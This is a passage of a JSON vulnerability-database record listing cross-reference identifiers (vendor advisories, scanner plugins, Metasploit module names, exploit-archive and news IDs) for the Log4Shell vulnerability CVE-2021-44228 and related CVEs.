"DCE05236BD35B28C109059A740CACEE5CE345130605BA9DEA39EFDA6BC532303", "DE0FD4B46D08CEF1DEAA575A9047B1B4606E41D3DD7B29408B8769EA341B71D5", "E141221C1C63036AE1C76B976A04706F4495C39812FC722478A0C755043A0E14", "E1810AD4BA382A8D222D20A49D11C634E6C5240D3F69652E51FC068062DED465", "E41278F69BC61D835FAC88FBCE06075D73C74B99B009DE680A92B2B68FE577DB", "E636319395E5D666C247860149142969762B284D3BE296819A5644E6AE6DDA15", "E679F241D5F455DCABCB653D142792B97352015B6DD79A1EB36DB0B4D54B2902", "E67F6EE1C05A0DFBB7E42F8DDE81795FCC3D933297C925E42690163F0C1D21A6", "E775C68CA18D51E91E688F1880BD5AF1955B5F4DF7397FA28CC721E37DAFB99A", "E7E10B1CFDE7DBAE5E93EB8EF50E03FCA4DAE3C0D9270B040B02BCEE5D0199B9", "E8825B71ACE31BFAA5662E2357C5EEB425BA842AC21E60C761364799BFD2FEE3", "EBDD1B77CC71D5E7D7E88D21F7F8C7988F44B743E7ABCFC5258E806235EC65A9", "ED78D94545EF8A4A811D2C198EC427B8C46CA1FE3BBC9D6A2DC20DD440CB6FDC", "EFC94A6E1DA52C8EA7A5811D6A4381770FA24130DB4CFD911120046DD916261B", "EFD4687D2DC8ADFBEC960932263D6DA222DDFA92899BC72A9B9D62B4331178A6", "F0A55A55FE75D7879ACE84F93E653F8A50B8249B2C7592738EB4BD78485CC785", "F7232359E6413A274B62C22CB7BF1EF8C428ADFBF22EF7B9B913D63D087BCACB", "F89923018671257EB76989AE7AB9D39396FBAD6F8846CB56D6915361F1CCCC48", "FA8CCED2D5B77B978F428FA2F61CD879A13EF9DAC53A5435AC48BEE003AC2363", "FACE47A144B851A6BB630C0FD63FA2BFBE0A19AFE0A7E1A993E530FC0BA6BE90"]}, {"type": "ics", "idList": ["ICSA-21-357-02", "ICSA-22-034-01"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:357497C932E21C66FB08D2C9B8EE9CA2", "IMPERVABLOG:5E03360E0443A626205E9BCF969114F6", "IMPERVABLOG:7CB37AC69862942C5D316E69A7815579", "IMPERVABLOG:B4C9A56D0F82346F616E74B1CFB10A5D", "IMPERVABLOG:B69DFFED5C2E2C9D2F9917E3F4915200", "IMPERVABLOG:BB63986B2DE2CCB2C65DD3747791097F", "IMPERVABLOG:BE9CCB7ADF74E2AEFC999FEE704CDE71", "IMPERVABLOG:BEE8EB9D446D0AF62464EE59DFA0CE0E", "IMPERVABLOG:DB0BBA5A6E2E523FAA7F7A73C45FEA96"]}, {"type": "kaspersky", "idList": ["KLA12390", "KLA12391", "KLA12392", "KLA12393", "KLA12395", "KLA12396", "KLA12407", "KLA12442"]}, {"type": "kitploit", "idList": ["KITPLOIT:134021490040098714", "KITPLOIT:144331229809700743", "KITPLOIT:1680589374755422772", "KITPLOIT:3188944951765917430", "KITPLOIT:3773942873037113539", "KITPLOIT:4125185526326677098", "KITPLOIT:4333067961180534072", "KITPLOIT:4462385753504235463", "KITPLOIT:4654779182065061303", "KITPLOIT:5104415481503400470", "KITPLOIT:522409803487164759", "KITPLOIT:5734436811250397170", "KITPLOIT:5789499291738758939", "KITPLOIT:6422486000446318290", "KITPLOIT:6759391622067035795", "KITPLOIT:7976092996345827446", "KITPLOIT:8031680161397698025", "KITPLOIT:8148701901300660800", "KITPLOIT:8266451932034361580", "KITPLOIT:8945091038325456871"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:39A05D4A4EC81966F7A1721DFACB3470", "MALWAREBYTES:A325F8FB1D527BD3C6C1C3A187840632"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/LOG4SHELL_SCANNER/", "MSF:EXPLOIT/MULTI/HTTP/LOG4SHELL_HEADER_INJECTION/", "MSF:EXPLOIT/MULTI/HTTP/VMWARE_VCENTER_LOG4SHELL/"]}, {"type": "mmpc", "idList": ["MMPC:42ECD98DCF925DC4063DE66F75FB5433", "MMPC:BB2F5840056D55375C4A19D2FF07C695"]}, {"type": "mscve", "idList": ["MS:CVE-2021-44228"]}, {"type": "msrc", "idList": ["MSRC:543F3A129A47F4B14FB170389908717B"]}, {"type": "mssecure", "idList": ["MSSECURE:42ECD98DCF925DC4063DE66F75FB5433", "MSSECURE:BB2F5840056D55375C4A19D2FF07C695"]}, {"type": "nessus", "idList": ["AL2_ALAS-2021-001.NASL", "AL2_ALAS-2021-1730.NASL", "AL2_ALAS-2021-1731.NASL", "AL2_ALAS-2021-1732.NASL", "AL2_ALAS-2022-1750.NASL", "ALA_ALAS-2021-1553.NASL", "ALA_ALAS-2021-1554.NASL", "ALA_ALAS-2022-1562.NASL", "ALMA_LINUX_ALSA-2022-0290.NASL", "APACHE_DRUID_LOG4SHELL.NBIN", "APACHE_JSPWIKI_LOG4SHELL.NBIN", "APACHE_LOG4J_1_2.NASL", "APACHE_LOG4J_2_15_0.NASL", "APACHE_LOG4J_2_16_0.NASL", "APACHE_LOG4J_2_16_0_MAC.NASL", "APACHE_LOG4J_JDNI_LDAP_GENERIC.NBIN", "APACHE_LOG4J_JDNI_LDAP_GENERIC_HTTP_HEADERS.NBIN", "APACHE_LOG4J_JDNI_LDAP_GENERIC_TELNET.NBIN", "APACHE_LOG4J_JNDI_LDAP_GENERIC_RAW.NBIN", "APACHE_LOG4J_WIN_2_15_0.NASL", "APACHE_LOG4SHELL_CVE-2021-45056_DIRECT_CHECK.NBIN", "APACHE_LOG4SHELL_DNS.NBIN", "APACHE_LOG4SHELL_IMAP.NBIN", "APACHE_LOG4SHELL_MSRPC.NBIN", "APACHE_LOG4SHELL_NETBIOS.NBIN", "APACHE_LOG4SHELL_POP3.NBIN", "APACHE_LOG4SHELL_SMTP.NBIN", "APACHE_LOG4SHELL_SNMP.NBIN", "APACHE_LOG4SHELL_SSH.NBIN", "APACHE_LOG4SHELL_UPNP.NBIN", "APACHE_OFBIZ_LOG4SHELL.NBIN", "APACHE_SOLR_LOG4SHELL.NBIN", "CENTOS_RHSA-2021-5206.NASL", "DEBIAN_DLA-2842.NASL", "DEBIAN_DLA-2905.NASL", "DEBIAN_DSA-5020.NASL", "DEBIAN_DSA-5022.NASL", "EULEROS_SA-2022-1276.NASL", "FREEBSD_PKG_1EA05BB85D7411ECBB1E001517A2E1A4.NASL", "FREEBSD_PKG_3FADD7E4F8FB45A0A2188FD6423C338F.NASL", "FREEBSD_PKG_4B1AC5A35BD411EC8602589CFC007716.NASL", "FREEBSD_PKG_515DF85A5CD711ECA16D001517A2E1A4.NASL", "FREEBSD_PKG_650734B2766541709A0AEECED5E10A5E.NASL", "FREEBSD_PKG_B0F49CB9673611EC9EEA589CFC007716.NASL", "LOG4J_LOG4SHELL_FTP.NBIN", "LOG4J_LOG4SHELL_NTP.NBIN", "LOG4J_LOG4SHELL_PPTP.NBIN", "LOG4J_LOG4SHELL_RPCBIND.NBIN", "LOG4J_LOG4SHELL_SIP_INVITE.NBIN", "LOG4J_LOG4SHELL_SMB.NBIN", "LOG4J_LOG4SHELL_WWW.NBIN", "LOG4J_VULNERABLE_ECOSYSTEM_LAUNCHER.NASL", "MOBILEIRON_LOG4SHELL.NBIN", "OPENSUSE-2021-1577.NASL", "OPENSUSE-2021-1586.NASL", "OPENSUSE-2021-1601.NASL", "OPENSUSE-2021-1612.NASL", "OPENSUSE-2021-1613.NASL", "OPENSUSE-2021-1631.NASL", "OPENSUSE-2021-3999.NASL", "OPENSUSE-2021-4094.NASL", "OPENSUSE-2021-4107.NASL", "OPENSUSE-2021-4109.NASL", "OPENSUSE-2021-4111.NASL", "OPENSUSE-2021-4112.NASL", "OPENSUSE-2022-0038-1.NASL", "OPENSUSE-2022-0214-1.NASL", "OPENSUSE-2022-0226-1.NASL", "ORACLELINUX_ELSA-2021-5206.NASL", "ORACLELINUX_ELSA-2022-0290.NASL", "ORACLELINUX_ELSA-2022-0442.NASL", "ORACLELINUX_ELSA-2022-9056.NASL", "ORACLE_PRIMAVERA_GATEWAY_CPU_JAN_2022.NASL", "ORACLE_PRIMAVERA_P6_EPPM_CPU_JAN_2022.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_JAN_2022.NASL", "PALO_ALTO_LOG4SHELL.NASL", "REDHAT-RHSA-2021-5206.NASL", "REDHAT-RHSA-2021-5269.NASL", "REDHAT-RHSA-2022-0290.NASL", "REDHAT-RHSA-2022-0436.NASL", "REDHAT-RHSA-2022-0438.NASL", "REDHAT-RHSA-2022-0447.NASL", "REDHAT-RHSA-2022-0448.NASL", "REDHAT-RHSA-2022-0475.NASL", "REDHAT-RHSA-2022-0524.NASL", "SL_20211220_LOG4J_ON_SL7_X.NASL", "SPLUNK_824.NASL", "SUSE_SU-2021-14866-1.NASL", "SUSE_SU-2021-4111-1.NASL", "SUSE_SU-2021-4112-1.NASL", "SUSE_SU-2021-4115-1.NASL", "SUSE_SU-2022-0212-1.NASL", "SUSE_SU-2022-0214-1.NASL", "SUSE_SU-2022-0226-1.NASL", "SUSE_SU-2022-14881-1.NASL", "UBIQUITI_UNIFI_NETWORK_LOG4SHELL.NBIN", "UBUNTU_USN-5192-1.NASL", "UBUNTU_USN-5192-2.NASL", "UBUNTU_USN-5197-1.NASL", "UBUNTU_USN-5223-1.NASL", "VMWARE_HORIZON_LOG4SHELL.NBIN", "VMWARE_VCENTER_LOG4SHELL.NBIN", "VMWARE_VREALIZE_OPERATIONS_MANAGER_LOG4SHELL.NBIN", "WEB_APPLICATION_SCANNING_113075"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2022"]}, {"type": "oraclelinux", "idList": ["ELSA-2021-5206", "ELSA-2022-0290", "ELSA-2022-9056"]}, {"type": "osv", "idList": ["OSV:GHSA-3QPM-H9CH-PX3C", "OSV:GHSA-3W6P-8F82-GW8R", "OSV:GHSA-7RJR-3Q55-VV33", "OSV:GHSA-FP5R-V3W9-4333", "OSV:GHSA-J3CH-VJPH-8Q6V", "OSV:GHSA-J7C3-96RF-JRRP", "OSV:GHSA-JFH8-C2JP-5V3Q", "OSV:GHSA-MF4F-J588-5XM8", "OSV:GHSA-V57X-GXFJ-484Q", "OSV:GHSA-W9P3-5CR8-M3JJ"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:165261", "PACKETSTORM:165270", "PACKETSTORM:165532", "PACKETSTORM:165642", "PACKETSTORM:165673"]}, {"type": "paloalto", "idList": ["PA-CVE-2021-44228"]}, {"type": "qt", "idList": ["QT:7EFAEDCED59EA2EE3AB98A0A484C5825"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:13C1A00A7D0A7B1BB16D0AB5B1E9B51A", "QUALYSBLOG:33FD0B08A1B2E414EAA2ADDFCDFE0EB1", "QUALYSBLOG:3F1898282AF38991E0B849D7A68D2A2B", "QUALYSBLOG:3FADA4B80DBBF178154C0729CFC1358F", "QUALYSBLOG:42335884011D582222F08AEF81D70B94", "QUALYSBLOG:5059D1C3913FB6542F3283A66F9B3A43", "QUALYSBLOG:68BBBF644900DA0A883AABB0E4E3F28B", "QUALYSBLOG:6C71B912ABF74BE51F014EC90669CF30", "QUALYSBLOG:C2ECE416E32C6CC230B13471D41A4E03", "QUALYSBLOG:C3C14B989683A02C2C9A98CE918FBC3C"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:078D5EE222682A75AE1A1A3A3684E38D", "RAPID7BLOG:0C5C51ED53983B92C7C9805E820366C9", "RAPID7BLOG:18CF89AA3B9772E6A572177134F45F3A", "RAPID7BLOG:18D49792276E208F17E7D64BCE2FDEF6", "RAPID7BLOG:1D39E7BBA13704DCBB8153C89ABE6B72", "RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", "RAPID7BLOG:2FFDE45F01FA44216BE91DD7AFA0D060", "RAPID7BLOG:45B045D2EE21432DF9939E4402522BFC", "RAPID7BLOG:4CDB288231FA4BF52C0067D9D4FEABBF", "RAPID7BLOG:602109CBDD808C41E4DDC9FBC55E144D", "RAPID7BLOG:6EADCD983283E3D546EF2907978E95F1", "RAPID7BLOG:7767347A5784FF1C4901601A1A21D2C8", "RAPID7BLOG:7F1312E79E0925118565C90443170051", "RAPID7BLOG:9CB105938BDE92F573A2DE68BC20CF46", "RAPID7BLOG:AB5C0BC130F45073226CC41D25680EA0", "RAPID7BLOG:AF9E6199C63A57B22FAE6AAEDD650D39", "RAPID7BLOG:B6DE24165AA9AA83EDA117170EDDAD44", "RAPID7BLOG:C6C1B8357ABD28AEB0F423A0A099098A", "RAPID7BLOG:CB62092B4C7E70876CF276BA04DD7597", "RAPID7BLOG:D1E1A150733F5AFC2C704DB26E7EAB30", "RAPID7BLOG:E3D08ECAA9A93569D5544F4D6AAEEB74", "RAPID7BLOG:E43819A7DE1DD0F60E63E67A27B9301B", "RAPID7BLOG:F14E17E573386DB3DDD27A8E829E49A1", "RAPID7BLOG:F37BD0C67170721734A26D15E6D99B3E", "RAPID7BLOG:F76EF7D6AB9EB07FC8B8BCE442DC3A69", "RAPID7BLOG:F9B4F18ABE4C32CD54C3878DD17A8630", "RAPID7BLOG:FB97B7B381BE98BE0077666DFDEC1953"]}, {"type": "redhat", "idList": ["RHSA-2021:5093", "RHSA-2021:5094", "RHSA-2021:5106", "RHSA-2021:5107", "RHSA-2021:5108", "RHSA-2021:5126", "RHSA-2021:5127", "RHSA-2021:5128", "RHSA-2021:5129", "RHSA-2021:5130", "RHSA-2021:5132", "RHSA-2021:5133", "RHSA-2021:5134", "RHSA-2021:5137", "RHSA-2021:5138", "RHSA-2021:5140", "RHSA-2021:5141", "RHSA-2021:5148", "RHSA-2021:5183", "RHSA-2021:5184", "RHSA-2021:5186", "RHSA-2021:5206", "RHSA-2021:5269", "RHSA-2022:0082", "RHSA-2022:0083", "RHSA-2022:0203", "RHSA-2022:0205", "RHSA-2022:0216", "RHSA-2022:0222", "RHSA-2022:0223", "RHSA-2022:0289", "RHSA-2022:0290", "RHSA-2022:0291", "RHSA-2022:0294", "RHSA-2022:0296", "RHSA-2022:0430", "RHSA-2022:0431", "RHSA-2022:0435", "RHSA-2022:0436", "RHSA-2022:0437", "RHSA-2022:0438", "RHSA-2022:0444", "RHSA-2022:0445", "RHSA-2022:0446", "RHSA-2022:0447", "RHSA-2022:0448", "RHSA-2022:0449", "RHSA-2022:0450", "RHSA-2022:0475", "RHSA-2022:0497", "RHSA-2022:0507", "RHSA-2022:0524", "RHSA-2022:0527", "RHSA-2022:0553", "RHSA-2022:0661"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-4104", "RH:CVE-2021-4125", "RH:CVE-2021-44228", "RH:CVE-2021-44832", "RH:CVE-2021-45046", "RH:CVE-2021-45105"]}, {"type": "securelist", "idList": ["SECURELIST:52D1B0F6F56EE960CC02B969556539D6", "SECURELIST:7A375F44156FACA25A0B3990F2CD73C1", "SECURELIST:9CC623A02615C07A9CEABD0C58DE7931"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:1577-1", "OPENSUSE-SU-2021:1586-1", "OPENSUSE-SU-2021:1601-1", "OPENSUSE-SU-2021:1612-1", "OPENSUSE-SU-2021:1613-1", "OPENSUSE-SU-2021:1631-1", "OPENSUSE-SU-2021:3999-1", "OPENSUSE-SU-2021:4094-1", "OPENSUSE-SU-2021:4107-1", "OPENSUSE-SU-2021:4109-1", "OPENSUSE-SU-2021:4111-1", "OPENSUSE-SU-2021:4112-1", "OPENSUSE-SU-2022:0038-1", "OPENSUSE-SU-2022:0040-1"]}, {"type": "symantec", "idList": ["SMNTC-19793"]}, {"type": "thn", "idList": ["THN:0468E8E1C5525F2A9F2ED37592AE0910", "THN:14CB4751E7438DE917A5DB217D67AA29", "THN:15D4F25153F9911661383B3B2153469D", "THN:16B3DB5DFBB6E86B79815E0E44D48021", "THN:1D10167F5D53B2791D676CF56488D5D9", "THN:1E1BEA193C556F91F471CD5B785B85B3", "THN:1E4DA950F02E02DFD1649B39A06A82C6", "THN:2656971C06C4E3D4B0A8C0AC02BBB775", "THN:317555CB8AA3A9E1AE70E218E44CC2EE", "THN:365025B2416483B34C70F02EDA44131E", "THN:368B6517F020AB4BF1B2344EDC8234A4", "THN:36D12A8768EE450B36B1C8D186F023E5", "THN:3E7257F45C71DCBDD0C320E7AAF383CA", "THN:4BC5D1A9ACDADBABF85BF51166D61386", "THN:5BAE3325983F971D1108722C454FF9AB", "THN:5CB7AEBFFE369D293598A4FDBFDFCEE3", "THN:5D8CEBFFF41D128545CD83F6F45D68F4", "THN:602D65D576B090BAC4B0C96998F8F922", "THN:656628F2B0FBE9789F4434FCAFFBCFE1", "THN:668DE2C9CFD709125451AF8F3FE12E6C", "THN:683B509BDB84EA9FEBCF0B1EE68D0C08", "THN:686DDFA07B415C41BA7AB9B8970557EF", "THN:6E47D45D685F44083BE0A6763799D209", "THN:7192158FCB73BD803AF179B755D61CD1", "THN:76D7572EDBE770410D6F0518DAD8B0AD", "THN:7958F9B1AA180122992C6A0FADB03536", "THN:7A9C39D8DACC3A4C7336ECA18FD3D889", "THN:833B2B9623F1C64D20868B947E8BE4E0", "THN:83D31EE6B3E59778D812B3B7E67D7CD6", "THN:88184AFF85BF7EC0848D95E6BB0BEDB4", "THN:933FE23273AB5250B949633A337D44E1", "THN:9C12FFDB69779929861327CF77B13726", "THN:A12549603E494D035DF4BABEC04EBD5D", "THN:AFF2BD38CB9578D0F4CA96A145933627", "THN:B078A239291615ADE17044ED56E2347B", "THN:C221700D7BBC27110090E137F7288FA3", "THN:C4188C7A44467E425407D33067C14094", "THN:C73B84809CDC20C90C26FF1B7F56F5D4", "THN:DC2D78987D283D806FF145511EF10596", "THN:E006E516DD134F047ED991AC23F057A4", "THN:F8D94BE25D6D25E0F52FB4433E619721", "THN:FADB0A82C9DCE0870E617D4A8E5A34A6"]}, {"type": "threatpost", "idList": ["THREATPOST:02A472487653A461080415A3F7BB23D2", "THREATPOST:03FC9E97BBF9730C5990E8A220DD5E9A", "THREATPOST:065F7608AC06475E765018E97F14998D", "THREATPOST:075BA69792AA7B1AE4C28E1CBE61E360", "THREATPOST:09118C676E28AC5D7BB791E76F75453C", "THREATPOST:0B290DDF3FE14178760FDC2229CB1383", "THREATPOST:0C3BAA4DB9E2B5E8A30DD20A987FCE03", "THREATPOST:0FD7F2FA7F2D3383F582553124EA843D", "THREATPOST:10245D9804511A09607265485D240FFF", "THREATPOST:10D0F1DDDD6C211DA3CE6395900B7C54", "THREATPOST:1309DBA0F8A2727965C6FA284A002D3B", "THREATPOST:138F67583DAC26A61D1AB90A018F1250", "THREATPOST:13D4AE4C03A3BF687491FDA1E8D732C7", "THREATPOST:14D52B358840B9265FED987287C1E26E", "THREATPOST:187B01687ED5D3975CD6E42E84DD9B13", "THREATPOST:19BDD881931703B28F7B93492E0C75FD", "THREATPOST:1A553B57472BB0EB8D69F573B510FDE6", "THREATPOST:1B42481449E86FEA3940A2E1E2634309", "THREATPOST:1BE6320CDA6342E72A5A2DD5E0758735", "THREATPOST:1CC682A86B6D521AD5E357B9DB3A1DFB", "THREATPOST:1EB961A6936CB97E2DE6C0212349367F", "THREATPOST:1F99A9A6A418194B87E5468CC8344FBF", "THREATPOST:20F9B8CE2D092108C0F78EC3E415F6B4", "THREATPOST:2246F7085606B44A031DC14D1B54B9DB", "THREATPOST:23B6C10D7EF469BE8ED27D1C9AFB526A", "THREATPOST:2707644CA0FB49ADD0ECA1B9AFDA0E8A", "THREATPOST:27C5AA551B5793DEA8848FB76DE52B32", "THREATPOST:2C0E12580D3C2F1CE7880F6955D4AA1E", "THREATPOST:305513A61FA2B0EF500854C82DF34A9C", "THREATPOST:31091088EDBCEEF43F75A2BA2387EB5C", "THREATPOST:31D14CEE5977BF71F79F7C30AEC10698", "THREATPOST:34D98758A035C36FED68DDD940415845", "THREATPOST:3697F9293A6DFF6CD5927E9E68FF488A", "THREATPOST:38E8D69F26ADB15A989532924B2A98C4", "THREATPOST:3A1C8593C0AAEFA3AF77D1A207BD0B65", "THREATPOST:3A5F59D56E40560C393A3F69A362A31B", "THREATPOST:3ADFDD3CC93B03F83C2CEC5583B016AB", "THREATPOST:3B06E49AA3C9F001C97038682A9BF73F", "THREATPOST:3B8B02F621E9D9883A541B1B26BDF410", "THREATPOST:3DB85AFFEA9491ACBD8909D0CF5FBAEA", "THREATPOST:3EDC338ECB2601F5A49A9ED5E087B776", "THREATPOST:42AAB266C740220CFF57204DDF71129E", "THREATPOST:436D209F4CB01B99FC9576DFE08DE145", "THREATPOST:46837E7270195429E1D891848E911254", "THREATPOST:49177F7B5015CE94637C97F64C2D4138", "THREATPOST:4D63851D1493E3861204B674ADBC7F01", "THREATPOST:4D892A0342695D6703703D63DCC1877C", "THREATPOST:503327A6AB0C76621D741E281ABCFF77", "THREATPOST:5531DA413E023731C17E5B0771A25B3D", "THREATPOST:5B680BEF3CD53FFB3B871FF7365A4C47", "THREATPOST:5B9D3D8DB4BFEDE846215C1877B275ED", "THREATPOST:5C1E777F8F9FC173EF97E95D8AFAA5F2", "THREATPOST:5CCE0C2607242B16B2880B331167526C", "THREATPOST:5F6690E820E1B143D99DD5974300C6FF", "THREATPOST:6067B6D35C99BFCFF226177541A31F69", "THREATPOST:647D7D894452D9C46B3E86F5491EED49", "THREATPOST:65F4E74D349524EBAC2DA4A4ECF22DD8", "THREATPOST:6675B640474BF8A8A3D049DB0266A118", "THREATPOST:66848A3C9B8917C8F84DFDC04DD5F6D9", "THREATPOST:68B92CE2FE5B31FB78327BDD0AB7F21C", "THREATPOST:6C547AAC30142F12565AB289E211C079", "THREATPOST:6D28B6E17A92FE11F55907C143B3F5DD", "THREATPOST:751A0E2371F134F90F39C20AB70C1E2A", "THREATPOST:76A072EE53232EB197F119EC2F7EAA74", "THREATPOST:76A5549135F9D578FFC2C8FACC135193", "THREATPOST:795C39123EE147B39072C9434899E8FE", "THREATPOST:796DFA4804FEF04D3787893FCDFF97D2", "THREATPOST:7DDE7BA7A7916763BDDB5D0C565285DA", "THREATPOST:81021088670E95FC0EBB2F53E1FB2AD2", "THREATPOST:81DEAED9A2A367373ADA49F1CCDCA95D", "THREATPOST:8594A8F12FC5C97E7E62AF7B9BE3F1AA", "THREATPOST:8601D6EF6AB3201E582A218391B19C3F", "THREATPOST:883A7DED46A4E1C743AFFBA7CDCF4400", "THREATPOST:89AA48C3C48FA427AB660EDEE6DBCBE2", "THREATPOST:8A372065BFA1E6839DAF0386E9D8A1F5", "THREATPOST:8B78588647E8548B06361DBB1F279468", "THREATPOST:8D57BD39C913E8DDC450DD9EF2564C2C", "THREATPOST:8E47F9D5A51C75BA6BB0A1E286296563", "THREATPOST:8FFF44C70736D8E21796B9337E52F29D", "THREATPOST:932AA74F12B9D2AD0E8589AC1A2C1438", "THREATPOST:9374ECD9CCFC891FC2F3B85DF0905A1C", "THREATPOST:95BDCA2096B58A0697E169C01B1E0F09", "THREATPOST:970C9E73DF1FF53D70DB0B66326F3CB0", "THREATPOST:97D06649A596B5E25E2A11E3D275748B", "THREATPOST:987673B6BC03D7371ADC88E9BDA270D5", "THREATPOST:98F735BF442C3126E4A9FFBB60517B96", "THREATPOST:9922BFA77AFE6A6D35DFEA77A4D195C0", "THREATPOST:99C6C1555ACD07B4925765AED21A360C", "THREATPOST:9D96113FADFD4FBCA9C17B78B53A8C93", "THREATPOST:9E222E9232D1D59183559B17E97BADCD", "THREATPOST:A07707C9B30B86A691C1A24C4DC65EE6", "THREATPOST:A6096ACCB3F0C38BC6570E1DDE3E8844", "THREATPOST:AB54F1EB518D88546D1EF9DBA5E1874B", "THREATPOST:AE9B4708A7A9B6F3A24C35E15C6150A4", "THREATPOST:AFD74E86954C5A08B3F246887333BDF3", "THREATPOST:B11E42D0B4C56E4CC482DEF6EA0B4AC7", "THREATPOST:B2FEDF3EA50507F526C77105093E8977", "THREATPOST:B318814572E066732E6C32CC147D95E2", "THREATPOST:B3A92C43D5FF3C53BE8EF06C687B80B6", "THREATPOST:B796D491D9E59A6CE14A74FFE427D175", "THREATPOST:B9CCF4B8B7E25CEC369B248303882707", "THREATPOST:BA0FA5036C385C822C787514850A67E5", "THREATPOST:BDCC3D007E103708BD7CA085B29EF2CB", "THREATPOST:BE11CFFFFEA1B470C8A24CA24D76A7C6", "THREATPOST:C4369D60DE77B747298623D4FD0299B3", "THREATPOST:C754ECCAF3F8A3E6BCD670A88B3E4CAA", "THREATPOST:C9FBCC2A1C52CDB54C6AAB18987100F4", "THREATPOST:CAA9AA939562959323A4675228C233A5", "THREATPOST:CD9589D22198CE38A27B7D1434FEE963", "THREATPOST:CEEE25A4A4491980FA1ECB491795DBA9", "THREATPOST:CF3033203781AAC4EAAE83DDCF93ADE8", "THREATPOST:CF4E98EC11A9E5961C991FE8C769544E", "THREATPOST:CF93F3E6D1E96AACFAEE9602C90A711D", "THREATPOST:D098942E4435832E619282E1B92C9E0F", "THREATPOST:D358CF7B956451F0C53F878AF811409F", "THREATPOST:D5E02B5FD2809DCACF41DA1190794921", "THREATPOST:DD0FE8D3D9D205FA5CCA65C3EBDD62D2", "THREATPOST:DE6A0C7ECE2973F596891B00DC078055", "THREATPOST:DF2C6B28792FEC8F2404A7DC366B848F", "THREATPOST:E09CE3FA2B76F03886BA3C2D4DB4D8DB", "THREATPOST:E0C8A3622AEF61D726EED997C39BADFE", "THREATPOST:E60D2D0CCA5A225CA4BF5CEB5C7C3F59", "THREATPOST:E8A3AD011F9759F38AAB48D776396878", "THREATPOST:EC28F82F6C3ECD5D0BA7471D5BA50FD6", "THREATPOST:EE0A71A925297032000651C344890BDD", "THREATPOST:F72FDE7CB5D697EFD089937D42475E50", "THREATPOST:F87A6E1CF3889C526FDE8CE50A1B81FF", "THREATPOST:FC38FE49CDC6DFAD4E78D669DBFA5687", "THREATPOST:FDD0C98FAA16831E7A3B7CCE3BFC67FF", "THREATPOST:FDF0EE0C54F947C5167E6B227E92AE63", "THREATPOST:FE7B13B35ED49736C88C39D5279FA3D1"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:C927C873A9E9A7AF6B74D64EFAFA6B02"]}, {"type": "typo3", "idList": ["TYPO3-PSA-2021-004"]}, {"type": "ubuntu", "idList": ["USN-5192-1", "USN-5192-2", "USN-5197-1", "USN-5223-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-4104", "UB:CVE-2021-44228", "UB:CVE-2021-45046"]}, {"type": "vmware", "idList": ["VMSA-2021-0028.1", "VMSA-2021-0028.10", "VMSA-2021-0028.11", "VMSA-2021-0028.12", "VMSA-2021-0028.13", "VMSA-2021-0028.2", "VMSA-2021-0028.3", "VMSA-2021-0028.4", "VMSA-2021-0028.6", "VMSA-2021-0028.7", "VMSA-2021-0028.8", "VMSA-2021-0028.9", "VMSA-2021-0030"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:060FBB90648BCDE11554492408AE89C8", "WALLARMLAB:2AAA5E62EED6807B93FB40361B4927CB", "WALLARMLAB:90D3FFE69FF928689D36310EF8B1C4F3", "WALLARMLAB:E86F01AF50087BEB03AAB46947CDE884"]}, {"type": "zdt", "idList": ["1337DAY-ID-37135", "1337DAY-ID-37136", "1337DAY-ID-37228", "1337DAY-ID-37257", "1337DAY-ID-37264"]}]}, "score": {"value": 4.0, "vector": "NONE"}, "backreferences": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:61BDCEC3AEF8E6FC9E12623DB54E8144", "AKAMAIBLOG:65F0FA2139A357151F74FA41EF42B50F", "AKAMAIBLOG:B0985AEDEB4DAED26BDA30B9488D329D", "AKAMAIBLOG:B0DBF0121097FA293565FB7E66E09AB3"]}, {"type": "almalinux", "idList": ["ALSA-2022:0290"]}, {"type": "amazon", "idList": ["ALAS-2021-1553", "ALAS-2022-1562", "ALAS2-2021-1730", "ALAS2-2021-1731", "ALAS2-2022-1739"]}, {"type": "apple", "idList": ["APPLE:251C897D47AD6A2DB0B7E3792A81C425"]}, {"type": "attackerkb", "idList": ["AKB:398CAD69-31E4-4276-B510-D93B2C648A74"]}, {"type": "avleonov", "idList": ["AVLEONOV:89C75127789AC2C132A3AA403F035902"]}, {"type": "centos", "idList": ["CESA-2021:5206"]}, {"type": "cert", "idList": ["VU:930724"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0936"]}, {"type": "checkpoint_security", "idList": ["CPS:SK176865"]}, {"type": "cisa", "idList": ["CISA:6C962B804E593B231FDE50912F4D093A", "CISA:8367DA0C1A6F51FB2D817745BB204C48", "CISA:918B5EC3622C761B0424597D3F7AFF7C", "CISA:920F1DA8584B18459D4963D91C8DDA33"]}, {"type": "cisco", "idList": ["CISCO-SA-APACHE-LOG4J-QRUKNEBD"]}, {"type": "citrix", "idList": ["CTX335705"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:690C01663F820378948F8CF2E2405F72"]}, {"type": "cloudlinux", "idList": ["CLSA-2022:1642429400"]}, {"type": "cve", "idList": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046"]}, {"type": "debian", "idList": ["DEBIAN:DSA-5020-1:32A64", "DEBIAN:DSA-5022-1:D26EE"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-4104", "DEBIANCVE:CVE-2021-44228", "DEBIANCVE:CVE-2021-45046"]}, {"type": "exploitdb", "idList": ["EDB-ID:50590", "EDB-ID:50592"]}, {"type": "f5", "idList": ["F5:K19026212", "F5:K24554520", "F5:K32171392"]}, {"type": "fedora", "idList": ["FEDORA:59AA230A7074"]}, {"type": "freebsd", "idList": ["1EA05BB8-5D74-11EC-BB1E-001517A2E1A4", "3FADD7E4-F8FB-45A0-A218-8FD6423C338F", 